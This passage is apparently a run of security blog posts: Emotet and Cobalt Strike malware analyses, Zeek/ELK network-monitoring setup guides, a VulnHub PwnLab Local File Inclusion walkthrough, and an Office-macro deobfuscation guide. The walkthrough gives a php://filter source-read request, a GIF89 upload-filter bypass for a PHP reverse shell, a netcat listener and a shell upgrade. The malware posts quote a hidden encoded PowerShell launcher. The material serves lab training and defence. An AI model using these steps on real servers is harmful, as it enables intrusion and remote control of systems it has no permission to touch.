We still need to obtain the Word document, but this is going to be difficult without being able to dump individual files. What we could do is dump the WinWord.exe process and try to carve the file out. This is a lot of effort, though, for what is likely to be commodity malware. So instead we’re going to cheat and just pull the file directly from the host, now that we know the path it’s located in. You could also do OSINT on the filename and try to find a copy on VT or AnyRun to download.
Emotet Analysis
As expected, the document contained a malicious VBS macro, which launches PowerShell with a base64 encoded command. I used CyberChef to decode the text from Base64 and also decoded the text from UTF-16LE (1200). Below we have the obfuscated PowerShell command:
I performed some basic deobfuscation of the code, which I’m not going to go into in this post. I have written how to deobfuscate Emotet Powershell in a previous post here.
Below is a rough deobfuscation of the PowerShell. We can see the script tries to download the file I3d47K.exe into the user’s directory from one of the URLs contained in the site list. A check of the file size of the downloaded file is performed to ensure that the file was properly downloaded, and if it passes that check, the file is then executed.
It’s interesting that we have not seen any sign of the executable I3d47k.exe within any of our Volatility outputs. It’s likely that this executable either drops fphc.exe or is renamed to this.
Executable Analysis
OSINT on our dumped application fphc.exe identifies it as Emotet, as expected. Dynamic analysis of the executable, however, has shown that it fails to execute properly. We see werfault.exe executed as a result of the application crash. It is possible for malware like TrickBot and Emotet to inject into WerFault; however, when this happens the command line for the process is usually empty, but in our case we have flags being passed. Additionally, we’re presented with a crash error, and there is no other typical Emotet activity.
There are a few reasons why the malware might not be executing properly, and the most likely is an error when dumping it from memory.
Review of Volatility 3
We’ve been able to build a rough picture of what has occurred on the host, but our analysis is not as complete as I would like. In forensics, you aim to build as clear a picture as possible, and in this case there are definitely some gaps in our timeline of what’s happened. There was some information missing from our evidence collected with Volatility, but this can often occur in memory forensics, as the data we’re dealing with is… volatile.
The lack of plugins for Vol 3 is something that makes me still favour Vol 2. This will change over time though. As the tool is more widely adopted, additional plugins will be developed. The Volatility Foundation’s annual plugin competition will from this year be focused on Volatility 3, and with official support for Volatility 2 ending in 2021, it’s only a matter of time before more users move to the newer version and the tool improves.
The two main things that Volatility 3 has going for it are its speed (a huge improvement on Vol 2) and the fact that it is now easier for developers to use the codebase to develop new plugins. The move away from OS profiles is also a welcome addition, as is its support for a larger variety of OS versions.
Volatility 3 Plugins
Here’s a list of the different Volatility 3 Plugins for Windows. Don’t forget there are also Mac and Linux plugins too.
Today we’re going to look at a malware campaign made up of multiple stages, with the end goal of establishing a C2 connection to a Cobalt Strike server. There are a few cool techniques that this campaign uses that we’re going to look at. I happened to come across the first-stage phishing attachment while browsing for samples on VirusTotal and found it interesting, as you do not commonly see JNLP attachments used for phishing. So, let’s get started.
Stage 1: Attachment Analysis
A JNLP file is a Java web file; when it is clicked, the application javaws.exe will attempt to load and execute it. Javaws.exe is part of the Java Runtime Environment and is used to give internet functionality to Java applications. JNLP files can be used to allow applications hosted on a remote server to be launched locally. It is worth noting that to be susceptible to phishing via a JNLP, the user will have to have Java installed on their machine.
They are generally quite simple and are not difficult to analyse. You can easily view the content of a JNLP file by changing the extension to XML and loading the file in a text editor like notepad++. As shown in the XML code below, we can see that this JNLP file will be used to load and execute the JAR file FedEx_Delivery_invoice.jar from the domain hxxp://fedex-tracking.fun
As we know the name and location of the 2nd stage payload, we can try and download it. The domain hxxp://fedex-tracking.fun is still up, so we can download the FedEx_Delivery_invoice.jar file from here. Once we have the file, we will analyse it with JD-GUI. JD-GUI is a simple tool that allows you to decompile and view the code of JAR files. (I copied the code into Atom after opening with JD-GUI as I like the syntax highlighting there.)
As the code snippet above shows, the FedEx_Delivery_invoice.jar file is going to attempt to download the file fedex912.exe from the domain hxxp://fedex-tracking[.]press. The executable will be placed into the Windows temp directory, where it will then be executed. The JAR file will also load the legitimate FedEx tracking website, most likely to reassure the user that the file they have downloaded is a legitimate one.
Executable Analysis: Stage 2
Unfortunately, at the time of writing, the domain hosting the fedex912.exe is no longer active meaning we cannot download the file from here. However, there is a sample on Virus Total that we can download. I ran the executable in my analysis environment with process monitor and regshot and there were a few things of note. Firstly, the file fedex912.exe drops a new file called gennt.exe, which is basically just a copy of itself, into the directory C:\ProgramData\9ea94915b24a4616f72c\. The reason for placing the file here is that it is a hidden directory and not normally visible to the user. It then deletes the fedex912.exe file from the filesystem.
I used RegShot to take a before and after snapshot of the registry to compare the two after running the executable. The entry below shows the malware’s persistence mechanism. Adding the gennt.exe executable to the registry key here ensures that the malware is started every time Windows is restarted.
After doing some additional research on the executable, I found that it is supposed to launch cmd which then launches PowerShell. However, that did not occur on my test machine when running the executable. There could be a few reasons for this, one could be that the malware has anti-analysis capabilities and knows when it is being run in a standard VM. As my lab is not currently set up to counter VM aware malware, we are going to cheat slightly and use data from a sample that was run on AnyRun.
On the AnyRun analysis, we can see that cmd did launch "C:\Windows\System32\cmd.exe" /c powershell -nop -w hidden -encodedcommand, where a Base64 command was passed to PowerShell. AnyRun records the command line, so let’s have a look into this. You can see the AnyRun analysis here.
PowerShell Analysis: Stage 3
As is usually the case, the command line was encoded with Base64 so I used CyberChef to decode the text. Often when you decode Base64 text there will be a “.” between every single character. This is annoying but can easily be fixed by also adding a decode text operator to the recipe and setting the value to UTF-16LE(1200).
We can see that the command is further encoded with Base64, and if we scroll further down to the bottom, we can also see that it has been compressed with GunZip.
I used CyberChef to once again decode the Base64 and to decompress the GunZip Compression.
After running the above CyberChef recipe there was finally some human-readable text. There’s a lot of interesting stuff happening here. So we essentially have three parts to the PowerShell script, there’s the first chunk with a couple of functions. The middle section with a Base64 Encoded block and a “for” statement. And then there’s the final section with some defined variables and an “if” statement. We’ll tackle the Base64 Encoded block first and look at the rest of the PowerShell script a little later.
NOTE: I had to split the code screenshots into two, as there is too much code to fit into one image. I’d much rather just post the raw code, rather than screenshots, but that would result in my site being flagged for hosting malware 😂. You can download the code samples at the bottom of this post.
One thing that immediately stands out is a “for” statement underneath the Base64 encoded text in the “Powershell Script part 2” image.
The “for” statement suggests that the Base64 block is XOR-encrypted with a key of 35. We can also use CyberChef to decrypt this.
As shown in the above output, a lot of it is not human-readable but we can see what looks like an IP address and information about a User-Agent. The rest of the code that we cannot understand looks to be shellcode. Let us try and do some basic shellcode analysis to see what is going on here.
I used CyberChef to convert the code above into hex. This is straightforward to do, and only requires an additional two operators in our current CyberChef recipe. One operator converts our code into hex, and the other is a find-and-replace to remove the spacing.
Once we have our hex code, we can save the output as a .dat file. Next, I used the tool scdbg to analyse the shellcode. This tool emulates basic Windows behaviour and can intercept the Windows API calls the shellcode is requesting by emulating the Windows API environment.
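Invoking it is as simple as pointing it at the .dat file (the file name here is just what I saved the CyberChef output as):

scdbg -f shellcode.dat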
After passing the .dat file to the tool, the output below is given. The shellcode loads the wininet API library and imports two functions which are used to establish an internet connection. We can see that the connection is established to the IP address we saw earlier over port 8080.
As the shellcode does not import any other functions, it would appear that this is a simple beacon program that establishes a remote connection to the malicious IP. Additional commands are likely to be sent from the C2 server. The C2 IP address is a Ukrainian address, with ports 80, 8080 and 22 open.
Injecting into memory with PowerShell
So we’ve looked at our Base64 encoded block and determined that it’s some simple shellcode which is used to establish a connection to the C2 server. The one question we still have to answer is how is the shellcode executed? From looking at the rest of the PowerShell script, we can see that the shellcode is injected directly into memory. Below gives a basic summary of how it does this.
First, the script imports two functions, GetModuleHandle and GetProcAddress, from system.dll, and it does this by importing them directly from memory, so it does not load the DLL from disk. These are both Windows UnsafeNativeMethods. Loading DLLs in this way is called run-time dynamic linking, and you can read more on it here.
These functions are then used to allocate space in memory for the function “var_va” which is the function which contains our shellcode.
Then the script decodes and decrypts the shellcode, in the same way that we did earlier with CyberChef.
Next, VirtualAlloc allocates space in the memory of the calling process and the shellcode function is written there. In this case, that process is PowerShell, so the shellcode is essentially injected into the memory space used by PowerShell.
And finally, the shellcode is then executed, where it establishes a C2 channel with the Cobalt Strike server.
What is Cobalt Strike?
AnyRun attributed the PowerShell activity to Cobalt Strike and the PowerShell script and the shellcode that we analysed matches the profile and behaviour of a Cobalt Strike Beacon. Cobalt Strike is a tool used for adversary simulations and red team operations. A key feature of the tool is being able to generate malware payloads and C2 channels. The Cobalt Strike Beacon that we saw is fileless, meaning that the PowerShell script injects the Beacon straight into memory and never touches disk. Once a Cobalt Strike Beacon is present on a device, the attacker has significant capability to perform additional actions including stealing tokens and credentials for lateral movement.
Conclusion
So that brings this post to an end. I hope you found the information here useful. It’s a simple example of fileless malware and, I think, a good introduction for those who are maybe not very familiar with the area. It’s certainly a topic that I’m interested in and something I want to research further, so expect more posts on this in the future!
This post marks the second instalment of the “Create enterprise monitoring at home” series; here is part one in case you missed it. In this post, we’ll be looking at how to send Zeek logs to the ELK stack using Filebeat. A few things to note before we get started:
I’m running ELK in its own VM, separate from my Zeek VM, but you can run it on the same VM if you want.
ELK is running on a Ubuntu 18.04 VM.
It’s pretty easy to break your ELK stack as it’s quite sensitive to even small changes, I’d recommend taking regular snapshots of your VMs as you progress along.
Installing Elastic
Installing Elastic is fairly straightforward. First, add the PGP key used to sign the Elastic packages, then add the Elastic APT repository and install the Elasticsearch package.
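Those steps look something like this (this is the same 7.x repository used later for Kibana and Filebeat):

wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-7.x.list
sudo apt-get update && sudo apt-get install elasticsearch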
Once installed, we need to make one small change to the Elasticsearch config file, /etc/elasticsearch/elasticsearch.yml. We’re going to set the bind address to 0.0.0.0; this will allow us to connect to Elasticsearch from any host on our network. It’s worth noting that putting the address 0.0.0.0 here isn’t best practice, and you wouldn’t do this in a production environment, but as we are just running this on our home network it’s fine.
Once that’s done, let’s start the Elasticsearch service and check that it’s started correctly.
sudo service elasticsearch start
sudo service elasticsearch status
You should get a green light and an active running status if all has gone well. Next, we want to make sure that we can access Elastic from another host on our network. I’m going to use my other Linux host running Zeek to test this. Run the curl command below from another host, and make sure to include the IP of your Elastic host.
curl -X GET "IP OF YOUR ELASTIC HOST:9200/?pretty"
If all has gone right, you should get a response similar to the one below.
Installing Kibana
Now it’s time to install and configure Kibana; the process is very similar to installing Elasticsearch. We’ve already added the Elastic APT repository, so it should just be a case of installing the Kibana package.
Once it’s installed, we want to make a change to the config file, similar to what we did with Elasticsearch. Change the server host to 0.0.0.0 in the /etc/kibana/kibana.yml file.
Once it’s installed, start the service and check the status to make sure everything is working properly.
sudo service kibana start
sudo service kibana status
You should get a green light and an active running status if all has gone well. Now let’s check that everything is working and we can access Kibana on our network. Browse to the IP address hosting kibana and make sure to specify port 5601, or whichever port you defined in the config file. You should see a page similar to the one below.
Configuring Zeek
Now that we’ve got Elasticsearch and Kibana set up, the next step is to get our Zeek data ingested into Elasticsearch. There are a couple of ways to do this. Filebeat has a module specifically for Zeek, so we’re going to utilise it.
First, go to the SIEM app in Kibana, do this by clicking on the SIEM symbol on the Kibana toolbar, then click the “add data” button. As shown in the image below, the Kibana SIEM supports a range of log sources, click on the “Zeek logs” button.
You have to install Filebeat on the host you’re shipping the logs from, so in our case we’re going to install Filebeat onto our Zeek server. Follow the instructions specified on the page to install Filebeat. Once installed, edit the filebeat.yml configuration file and change the appropriate fields. The username and password for Elastic should be kept as the default unless you’ve changed them. Make sure to change the Kibana output fields as well.
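As a rough guide, the fields to update in /etc/filebeat/filebeat.yml look something like the below, swapping in the address of your Elastic/Kibana host (192.168.1.20 is just a placeholder, as are the credentials):
setup.kibana:
  host: "192.168.1.20:5601"
output.elasticsearch:
  hosts: ["192.168.1.20:9200"]
  username: "elastic"
  password: "changeme"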
Once that is done, we need to configure Zeek to convert the Zeek logs into JSON format. First, stop Zeek from running.
zeekctl stop
Then add the line @load policy/tuning/json-logs.zeek to the file /opt/zeek/share/zeek/site/local.zeek.
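A quick way to do that, assuming the paths above, is:
echo '@load policy/tuning/json-logs.zeek' | sudo tee -a /opt/zeek/share/zeek/site/local.zeek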
Restart Zeek.
zeekctl deploy
And now check that the logs are in JSON format. Even if you are not familiar with JSON, the format of the logs should look noticeably different than before.
tail -f /opt/zeek/logs/current/dns.log
Now we need to configure the Zeek Filebeat module. First, enable the module.
sudo filebeat modules enable zeek
Then edit the config file, /etc/filebeat/modules.d/zeek.yml. We need to specify each individual log file created by Zeek, or at least the ones that we want Elastic to ingest. For each log file in the /opt/zeek/logs/ folder, the path of the “current” log, and any previous logs, has to be defined, as shown below.
If there are default log files in the /opt/zeek/logs/ folder, like capture_loss.log, that you do not wish to be ingested by Elastic, then simply set the “enabled” field to false. It’s important to set any log sources which do not have a log file in /opt/zeek/logs/ to enabled: false, otherwise you’ll receive an error. Also be careful with spacing, as YAML files are whitespace sensitive.
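As a sketch, an entry in zeek.yml might look something like the below for the DNS and connection logs, with an unused source switched off; the exact list of filesets you enable depends on which logs your Zeek install produces:
- module: zeek
  dns:
    enabled: true
    var.paths: ["/opt/zeek/logs/current/dns.log"]
  connection:
    enabled: true
    var.paths: ["/opt/zeek/logs/current/conn.log"]
  capture_loss:
    enabled: false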
Once that’s done, you should be pretty much good to go. Run the Filebeat setup and start the service.
sudo filebeat setup
sudo service filebeat start
If everything has gone right, you should get a success message when checking that the Zeek data has been ingested.
If you go to the Network dashboard within the SIEM app, you should see the different dashboards populated with data from Zeek! The dashboards here give a nice overview of some of the data collected from our network. We’ll learn how to build some more protocol-specific dashboards in the next post in this series.
Enriching with Suricata
This next step is an optional extra; it’s not required, as we already have Zeek up and working. However, adding an IDS like Suricata can give some additional information about the connections we see on our network and can identify malicious activity. Some people may think adding Suricata to our SIEM is a little redundant as we already have an IDS in place with Zeek, but this isn’t really true. While Zeek is often described as an IDS, it’s not really one in the traditional sense: Zeek collects metadata for connections seen on our network, and while there are scripts and additional packages that can be used with Zeek to detect malicious activity, it does not necessarily do this on its own. Suricata is more of a traditional IDS and relies on signatures to detect malicious activity. I often question the reliability of signature-based detections, as they tend to be very false-positive heavy, but they can still add some value, particularly if well tuned.
Installing Suricata
I’m not going to detail every step of installing and configuring Suricata, as there are already many guides online which you can use. I used this guide as it shows you how to get Suricata set up quickly. I’m going to install Suricata on the same host that is running Zeek, but you can set up a new dedicated VM for Suricata if you wish. Just make sure you assign your mirrored network interface to the VM, as this is the interface that Suricata will run against.
Once you have Suricata set up, it’s time to configure Filebeat to send its logs into Elasticsearch, which is pretty simple to do. Navigate to the SIEM app in Kibana, click on the “add data” button, and select “Suricata logs”.
Follow the instructions; they’re all fairly straightforward and similar to when we imported the Zeek logs earlier. Step 3 is the only one that’s not entirely clear: for this step, edit /etc/filebeat/modules.d/suricata.yml and specify the path of your suricata.json file.
var.paths: ["/my/path/suricata.json"]
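If the on-screen instructions haven’t already enabled the Suricata Filebeat module for you, it can be enabled the same way we enabled the Zeek one:
sudo filebeat modules enable suricata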
Once that’s done, complete the setup with the following commands.
./filebeat setup
./filebeat -e
If all has gone right, you should receive a success message when checking if data has been ingested.
We can also confirm this by checking the Network dashboard in the SIEM app, where we can see a breakdown of events from Filebeat.
Conclusion
And that brings this post to an end! It’s fairly simple to add other log sources to Kibana via the SIEM app now that you know how. I’d recommend adding some endpoint-focused logs; Winlogbeat is a good choice.
I’d say the most difficult part of this post was working out how to get the Zeek logs into ElasticSearch in the correct format with Filebeat. It’s not very well documented. In the next post in this series, we’ll look at how to create some Kibana dashboards with the data we’ve ingested.
In this series, I’m going to show you how you can utilise open source technology to build your own network monitoring solution good enough to be deployed in any enterprise environment! The two core technologies that we’re going to use are Zeek (formerly Bro) and ELK.
For those unaware, Zeek is an open-source network monitoring framework which creates alerts and events based on data collected from a network tap. One way I describe Zeek to people is that it’s essentially an IDS on steroids. It’s used throughout the industry, especially in the network anomaly space; in fact, the UK cybersecurity company Darktrace uses Zeek as a key component of their product.
The plan for this solution is to tap our home network with Zeek and feed the logs into ELK. With ELK we can run queries across our data, build out some beautiful dashboards with Kibana, and even create some analytics to automate detections. We will also look at deploying an endpoint agent on some devices and feeding those logs into ELK too.
Prerequisites
In order to follow along, you’ll need
A server/old PC capable of running Zeek and ELK
In my case, I have an HP Proliant ML350e running ESXI
The server needs to have a minimum of 2 free network ports
And for it to run smoothly at least 8GB memory and a decent processor.
A managed network switch which is capable of port mirroring.
Network Architecture
The diagram below shows a rough guide to my home network. The key points to take from this diagram are the mirror tap on the network and the mirror connection. To get the most out of Zeek, you need to tap the connection on your switch that goes to your router, essentially the connection from your LAN to the internet. By doing this we capture all traffic from our home network going out to the internet, from devices like iPhones connected to the Wi-Fi and the PiHole acting as our DNS server.
VMware Setup
You should first check that the physical NICs on your server are visible in ESXi. Go to Networking > Physical NICs in ESXi and you should see them there.
Both of these physical connections should connect into your switch, with one going into your mirror port, and the other a regular switch port. You can set your mirror port in your switch config. I have a Netgear GS110TP where port 2 is the one that goes into my router, and I have port 6 free, so that is the one I’ll configure to be the mirror port.
You’ll need to know which ports on your server correspond to which ESXi physical ports. For example, port 6 on my switch plugs into Eth1 on my server, and Eth1 is called vmnic1 in ESXi. So vmnic1 will be the mirror NIC.
Next, we need to create a virtual switch that will be used for the mirror data. Go to Networking > Virtual Switches > Add Standard Virtual Switch, and enter the details shown below, selecting your mirror NIC as “Uplink 1”. Make sure that you set promiscuous mode to “Accept”.
Now add a port group by going to Networking > Port Groups > Add port group, and assign the virtual switch you just created to it. Again, make sure promiscuous mode is enabled.
Now you’re ready to create your virtual machine; I’m using Ubuntu Server 18.04 for mine. When creating your VM, make sure you add both network adapters, including the one you’re using for the mirrored traffic.
Preparing for Zeek
Once you’ve got Ubuntu installed, do the usual updates.
sudo apt-get update
sudo apt-get upgrade
Now check that both of your network interfaces are detected by Ubuntu. It is highly likely that your Mirror port will be down. As you can see from the image below, both of my interfaces are detected but only the management interface (ens160) is up with an IP address assigned.
To fix this, let’s first put the interface into promiscuous mode, and then bring it “up”.
ip link set "your mirror int" promisc on
ip link set "your mirror int" up
Let’s now check that we’re receiving traffic on the mirror port by running tcpdump.
tcpdump -i "your mirror int"
If everything has worked, you should see the mirrored traffic flowing through the interface similar to the image below.
Installing Zeek
We’re now ready to crack on and install Zeek. To start, we need to install all the prerequisites. Do so by running the command below.
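For reference, on Ubuntu the dependency install looks roughly like this; package names can vary slightly between Zeek and Ubuntu releases, so check the Zeek documentation for your version:
sudo apt-get install cmake make gcc g++ flex bison libpcap-dev libssl-dev python3 python3-dev swig zlib1g-dev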
Unpack the compressed files and enter the Zeek download directory, then set the /opt/zeek directory we created earlier as the install directory.
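If you’re working from a release tarball, unpacking looks something like this; the filename below is just a placeholder for whichever version you downloaded:
tar -xzf zeek-3.0.0.tar.gz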
cd /home/paul/zeek
./configure --prefix=/opt/zeek
Now we’re ready to install Zeek, run the following make commands, and leave it to install (this can take some time)
make
make install
Next, we need to add the Zeek binaries to the PATH environment variable.
export PATH=/opt/zeek/bin:$PATH
And now we need to add some basic config to the node.cfg file, which is located in the /opt/zeek/etc/ directory. Uncomment the manager, proxy and worker-1 settings, and define your mirror interface in the worker-1 section.
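Once uncommented, the cluster section of node.cfg ends up looking roughly like the below, where ens192 is a placeholder for the name of your mirror interface:
[manager]
type=manager
host=localhost

[proxy-1]
type=proxy
host=localhost

[worker-1]
type=worker
host=localhost
interface=ens192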
Now we’re ready to deploy Zeek by running the command below
zeekctl deploy
If all goes well we should not get any errors, and we can check to make sure everything started up properly by checking the status of zeek.
zeekctl status
Everything looks good! So now let’s go and check the logs where our captured data is being written. Logs are located in the /opt/zeek/logs/ directory. The “current” directory holds the logs for the current day, while logs from previous days are archived off into their own directories. There’s also a different log file for each data type, like DNS connections, HTTP connections, etc.
Let’s check the DNS logs.
tail -f dns.log
Awesome! So everything is working correctly!
That concludes this post. Keep an eye out for part 2 of this series, where we’ll deploy ELK and feed our logs into Elasticsearch so we can build some beautiful dashboards to display our captured data.
This post is going to look at a Local File Inclusion vulnerability and how it can be exploited to gain a shell on a web server. To demonstrate this I’m going to be using the PWNLab exercise from VulnHub as it uses a nice example of LFI and also requires some other basic pentest steps which I think are useful to know as well. I’ll be using ParrotOS as my “attacker” virtual machine.
What is LFI?
Local File Inclusion is a vulnerability, predominantly affecting web applications, that allows an attacker to read and execute files. There are many different types of LFI; in this post we’ll be looking at a couple of examples which exploit LFI in PHP scripts. In most cases, LFI is caused by poor coding practice where variables are not properly defined or sanitisation is not used correctly. This can allow an attacker to upload or replace a file with their own malicious one, which is exactly what we’re going to do in this case.
Exploiting LFI
For those that wish to follow along, you can download the PWNLab VM image here.
To start, we need to find out the IP address of our vulnerable device, so we run a simple Nmap scan across the 192.168.1.0/24 range. We can see the IP address of our vulnerable device, and the scan shows that it’s running a web server, so let’s navigate to the IP in a web browser. We are greeted by a webpage with three buttons, the login and upload ones being of most interest. If we try to upload a file, we are told that we must log in first.
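For anyone following along, the initial scan was nothing special, something along these lines; the -sV service detection flag is optional but handy for spotting the web server:
nmap -sV 192.168.1.0/24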
As always, we’re going to need to perform some reconnaissance and scanning against this IP. As we know this is a web server, our tool of choice in this instance is Nikto. For those who are unaware, Nikto is a vulnerability scanner which comes bundled in Kali; it focuses on vulnerabilities in web applications and is a really great tool. We run a Nikto scan on our target IP.
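The scan itself is a one-liner pointed at the target, 192.168.1.72 being the IP of the PwnLab VM in my lab:
nikto -h http://192.168.1.72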
Straight away, the first thing that jumps out at us is the line
/config.php: PHP Config file may contain database IDs and passwords.
If we try to navigate to the page, we’re greeted by a blank page. We can, however, try to read the contents of the PHP file. The command below uses a PHP filter to bypass PHP execution by encoding the PHP code as Base64 before it has a chance to execute, so we can read the source instead of running it.
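As a rough sketch, the request looks something like this, with the page parameter pointed at the PHP filter and config as the resource (the IP is from my lab setup):
curl "http://192.168.1.72/?page=php://filter/convert.base64-encode/resource=config"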
We can then simply decode the output, where we are presented with the raw PHP code for the config file, which contains the login details to a database.
At this point it’s worth grabbing the source code for the other pages on the webserver too. We do this by running the same php://filter/convert command that we ran previously, but changing the resource to the other pages.
Firstly, the index page. Straight away we can see that it contains an “include” vulnerability where it references a cookie called lang. We’ll make a note of that and come back to it later.
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
    include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
    <title>PwnLab Intranet Image Hosting</title>
</head>
<body>
    <center>
        <img src="images/pwnlab.png"><br />
        [ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
        <hr/><br/>
        <?php
        if (isset($_GET['page']))
        {
            include($_GET['page'].".php");
        }
        else
        {
            echo "Use this server to upload and share image files inside the intranet";
        }
        ?>
    </center>
</body>
</html>
Next, we have the upload page. The main thing that sticks out here is that there is a whitelist on the type of file that can be uploaded to the webserver; it’s restricted to jpg, jpeg, gif and png files. Looking further down the code block, we can see that it is not just the extension of the file that is whitelisted, but also the MIME type. If we want to upload a file onto the server, we’re going to have to bypass these checks.
The final page, “login”, did not contain anything of interest so I’ve not included the decoded base64 code block.
Moving on, we know the index page has an include vulnerability, and we know that if we are logged into the site, we can upload an image onto the webserver. Our end goal is to get a shell on the web server, so our plan is to bypass the file filtering on the upload page and upload a shell script, then exploit the include vulnerability on the index page to get it to execute our shell script. First, we need to log in to the site.
So we’re going to try to connect to the database with the credentials we’ve stolen from the config file. If we connect to the MySQL database running on the webserver with the username ‘root’ and enter the decoded password, it works!
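The connection itself is just the standard MySQL client pointed at the webserver, again using the IP from my lab:
mysql -h 192.168.1.72 -u root -p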
We can select to “use” the “Users” table and select all (*) entries. Three users are returned, with their passwords, which look to be encoded in base64.
TIP: When pen testing it’s always a good idea to note down any usernames or passwords you encounter in a notepad file, this makes them easily accessible and will save you having to keep decoding/decrypting them.
After decoding the passwords, we can try to log in with one of the users’ credentials, and bingo, we’re in! We now have access to upload a file. As mentioned before, I’m using ParrotOS, which comes bundled with some pre-made web shell scripts; we’re going to use the php-reverse-shell.php script located in /usr/share/webshells/php/. If you’re not using ParrotOS, you can find the shell here on GitHub.
If you remember from before, there are restrictions on the type of files we can upload, so we need to make some changes to the file to bypass the whitelisting. We can bypass the MIME type filtering by placing ‘GIF89;‘ at the top of our shell script, and we will also need to ensure the script uses the ‘.gif‘ extension. Finally, we need to change the IP address and port in the shell script: the IP address is the one we want the shell to connect back to (so the IP address of your host machine), and the port can be anything that isn’t currently in use.
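As a rough illustration, the top of the modified script (saved with a .gif extension) ends up looking something like this; the exact magic string you need depends on how the upload page checks the MIME type:
GIF89;
<?php
// ...rest of php-reverse-shell.php here, with the IP and port variables updated...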
Once that’s done, we save the file and upload it onto the webserver. The small changes worked and were able to bypass the file filtering. We can confirm that the file was successfully uploaded by navigating to the “upload directory” on the webserver (which in this case is located at http://192.168.1.72/upload). Here we can see the fake GIF file we uploaded, where the hash value of the file has been used to rename the file. We need to make a note of the new file name, as we’re going to need it in the next step.
For the next step, we’re going to be using Burp Suite. Firstly, we need to intercept a page using the “Proxy” module in Burp. You’ll need to configure your browser to use Burp as a proxy; you can find a guide on how to do so here. Once that’s done, make sure you have “intercept” turned on within the Proxy module, and navigate to any page on the PwnLab web server. You should intercept something which looks similar to the image below.
The thing we are interested in here is the cookie value; if you remember back to earlier, the lang cookie contained an inclusion vulnerability. We’re going to point the lang cookie at the PHP shell script we uploaded onto the server. To do this, right-click anywhere in the whitespace of the intercepted request in Burp and select “Send to Repeater”. Now navigate to the Repeater module in Burp and replace the value of the lang cookie with the path of the script we uploaded and noted down earlier.
Before forwarding this modified request on to the webserver, we need to set up a Netcat listener on the port we defined in the PHP script earlier, in this case 1234. (Some readers may have noticed I’ve moved over to a Windows box; this is because I broke my ParrotOS VM, not for the first time!)
We set up the listener by using the command below.
nc -l -p 1234
Then we can “send” our modified HTTP GET request to the webserver from Burp, and boom, we should receive a shell in Netcat as shown below.
We then can upgrade our shell by running the below command.
python -c 'import pty;pty.spawn("/bin/bash")'
And now we’re free to roam around on the web server and attempt to escalate our privileges.
Conclusion
That concludes this short post on LFI with a few other pen testing tricks thrown in. Although LFI is not a new topic, due to poor practice it’s still prevalent, and I thought that this lab exercise showed a good example of how it can be exploited and the damage that can be done.
Static analysis is the process of analysing malicious code, whether it be a script or a program, to determine what action the code is trying to execute. Unlike dynamic analysis, static analysis does not involve executing or running the code.
There are loads of open-source tools out there which can be used to perform static analysis; today we are going to be looking at OLE Tools and CyberChef.
OLE Tools (oletools) is a Python package used to analyse Microsoft Office documents. Malicious VBA scripts within macros embedded in Office documents are a common malware distribution technique, so oletools is a very useful package to have in your toolkit.
CyberChef is a web application created by GCHQ, it is often referred to as the swiss army knife tool of cyber, and can be used for encryption, encoding, compression and data analysis, it’s a must-have tool in any toolkit.
NOTE: It’s worth noting that this guide is meant to demonstrate the steps to reverse common obfuscation techniques. You may encounter different obfuscation techniques depending on the document sample you have, however, the same logic can still be applied.
Getting Setup
If you haven’t already, install pip.
sudo apt install python3-pip
Then install oletools.
sudo -H pip install -U oletools
Find a malicious office document, there are a number of sources where you can download these files, see the resources section at the bottom of this page for a list of sample websites.
I would suggest CAPE Sandbox, as it does not require any signup and allows you to get your hands on a sample quickly; make sure you select a sample with the file type “doc”.
Using oletools
Once you’ve got everything prepared, navigate to the directory where your downloaded file lives. Run the first command to obtain metadata about the file. (Replace the text “filename” with the name of the malicious file that you downloaded.)
olemeta "filename"
Running this command returns some useful metadata about the document.
Output from running “olemeta” on our malicious document
It is the macros embedded in the document that we are interested in, so next let’s see if the file contains any. Run the oleid command.
oleid "filename"
By running this command we can see that the document does contain a VBA Macro. This is what we’re interested in.
Output from running “oleid” on our malicious document
Let’s try to extract those macros out of the document by running the olevba command.
olevba "filename"
The table shown in the image below will be displayed at the bottom of your terminal session; it contains an overview of what was found in the macro. The information we are most interested in is the Base64-encoded strings. Encoding with Base64 is a common technique used by malware authors to try to obfuscate their code and make it more difficult for anti-virus to detect.
Output from running “olevba” command on our malicious document
If you scroll up the page, you will see all of the data pulled from the macro; we want to find the Base64-encoded text. You should be able to easily recognise Base64 encoding, in this case it’s the big block of text.
Visual basic code from document macro encoded in Base64
The first thing to do is to take the Base64-encoded text and decode it. We do this by dragging the “From Base64” operator into the recipe column, then pasting the encoded text block into the input box.
Code decoded using from Base64 operator
Tip: If you’re ever unsure on the format of a piece of text or what it has been encoded with, you can use the magic operator to find out!
You should immediately be able to see that the output is now more understandable, however, the author has taken a number of steps to further obfuscate the code and make it more difficult for us to analyse. Adding punctuation between characters is a common obfuscation technique used by malware authors, as displayed in our code block below.
We’re going to take our decoded code block and use other features in CyberChef to reverse the obfuscation and make the code more understandable. Firstly, we’re going to remove the full stops between each character. Keep the “From Base64” operator in your recipe and drag the Regular expression operator in as well; keeping the settings at their defaults should remove the full stops.
Output of code with from base64 and Regular expression operators
That already looks a lot better, and you should be able to see some useful information like URLs in the output. There is still some obfuscation via punctuation in the code, though, so let’s remove that too.
We’re going to start a new CyberChef recipe now because sometimes using lots of operators together can cause CyberChef to freak out a little. So copy the output to your clipboard, and start a new recipe.
In your new recipe paste the copied code into the input, and add the following operators.
To Lower Case
Find and Replace, x4 with the following settings.
All variables set to “simple string”
With the values
`
–
+
‘
The “replace” value should be blank for each. This replaces the punctuation with nothing, effectively removing it from the code.
Generic Code Beautify (to tidy the code up a little).
Code output after the full recipe is applied.
Hopefully, after all of that, you should end up with something a lot more readable. We are not done there, however; we’re going to take the output and perform some manual editing to get a better idea of what the code is doing.
Editing with Atom
Atom is a text/source code editor and my go-to choice for working with any code within Linux; see the resources section for a guide on how to install Atom.
First things first, we need to install a Visual Basic package in Atom to highlight syntax for us. Do this by going to the top toolbar in Atom and clicking Packages > Settings View > Install Packages. In the search bar, search for VBA and install one of the syntax highlighting packages for Visual Basic. Copy the most recent output from CyberChef and paste it into Atom, making sure to save the file with the .vba extension so Atom can perform syntax highlighting.
VBA script with syntax highlighting in Atom.
